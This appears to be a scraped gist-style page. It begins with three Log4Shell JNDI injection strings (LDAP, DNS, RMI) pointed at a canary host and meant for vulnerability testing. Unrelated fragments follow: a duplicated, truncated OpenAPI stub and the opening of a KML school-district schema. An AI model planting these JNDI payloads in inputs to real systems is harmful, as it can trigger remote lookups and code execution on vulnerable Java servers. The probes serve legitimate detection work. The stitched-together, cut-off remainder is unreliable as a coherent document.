Replace test.example.com with your canary service of choice.
${jndi:ldap://test.example.com}
${jndi:dns://test.example.com}
${jndi:rmi://test.example.com}
| openapi: 3.0.0 | |
| servers: | |
| - url: 'http://example.com' | |
| info: | |
| description: This is an example | |
| version: 0.0.1 | |
| title: Example | |
| termsOfService: '' | |
| paths: | |
| /foobar: |
| openapi: 3.0.0 | |
| servers: | |
| - url: 'http://example.com' | |
| info: | |
| description: This is an example | |
| version: 0.0.1 | |
| title: Example | |
| termsOfService: '' | |
| paths: | |
| /foobar: |
| <?xml version="1.0" encoding="utf-8" ?> | |
| <kml xmlns="http://www.opengis.net/kml/2.2"> | |
| <Document id="root_doc"> | |
| <Schema name="School_Districts__v17a_" id="School_Districts__v17a_"> | |
| <SimpleField name="OBJECTID" type="int"></SimpleField> | |
| <SimpleField name="FIPSCODE" type="string"></SimpleField> | |
| <SimpleField name="FIPSNUM" type="int"></SimpleField> | |
| <SimpleField name="LABEL" type="string"></SimpleField> | |
| <SimpleField name="TYPE" type="string"></SimpleField> | |
| <SimpleField name="DCODE" type="string"></SimpleField> |